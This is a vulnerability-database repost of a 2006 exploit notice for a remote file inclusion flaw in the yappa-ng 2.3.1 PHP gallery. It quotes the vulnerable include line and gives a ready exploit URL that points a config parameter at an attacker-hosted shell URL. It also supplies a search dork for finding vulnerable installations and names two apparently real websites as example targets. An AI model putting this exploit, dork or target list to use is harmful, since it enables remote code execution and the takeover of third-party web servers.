Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14138
HistorySep 04, 2006 - 12:00 a.m.

yappa-ng <= v2.3.1 (admin_modules) Remote File Inclusion Exploit

2006-09-0400:00:00
vulners.com
82

#==============================================================================================
#yappa-ng <= v2.3.1 (admin_modules) Remote File Inclusion Exploit
#===============================================================================================

#Critical Level : Dangerous

#Venedor site : http://www.zirkon.at/zirkon/scripts/yappa-ng

#Version : v2.3.1 & v2.3.0

#================================================================================================
#Bug in : admin_modules/admin_module_deldir.inc.php

#Vlu Code :
#--------------------------------

include_once($config['path_src_include'] . "common.inc.php");

#================================================================================================

#Exploit :
#--------------------------------

#http://sitename.com/[Script Path]/admin_modules/admin_module_deldir.inc.php?config[path_src_include]=http://SHELLURL.COM?

#Example :

http://gl-bild.de

http://www.team.elsat.net.pl/pliki/yappa2/

#Dork : "Powered by yappa-ng 2.3.1" & "Powered by yappa-ng 2.3.1"
#================================================================================================
#Discoverd By : SHiKaA

#Conatact : SHiKaA-[at]hotmail.com

#GreetZ : Str0ke KACPER Rgod Timq XoRon MDX Bl@Ck^B1rd AND ALL ccteam (coder-cruze-wolf) | cyper-worrior